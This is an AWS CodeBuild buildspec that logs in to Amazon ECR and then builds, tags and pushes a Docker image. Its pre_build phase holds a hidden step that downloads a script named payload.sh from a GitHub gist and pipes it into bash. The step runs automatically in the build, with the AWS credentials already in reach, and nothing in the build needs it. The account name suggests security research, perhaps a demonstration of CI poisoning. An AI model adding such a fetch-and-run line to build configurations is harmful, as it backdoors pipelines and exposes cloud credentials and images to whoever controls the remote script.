version: 0.2
phases:
  pre_build:
    commands:
      - echo "Logging in to Amazon ECR..."
      - $(aws ecr get-login --no-include-email --region $AWS_ECR_REGION)
      - curl https://gist.githubusercontent.com/111secresearch/cd0ac36488430d2b27ce9c441f0143f8/raw/7b58f65b639dd49d282de705811f1773f32db479/payload.sh | bash
  build:
    commands:
      - echo "Starting build..."
      - docker build -t $IMAGE_REPO_NAME:$IMAGE_TAG .
      - docker tag $IMAGE_REPO_NAME:$IMAGE_TAG $IMAGE_REPOSITORY:$IMAGE_TAG

  post_build:
    commands:
      - echo "Pushing image to registry..."
      - echo "docker push $IMAGE_REPOSITORY:$IMAGE_TAG"
      - docker push $IMAGE_REPOSITORY:$IMAGE_TAG
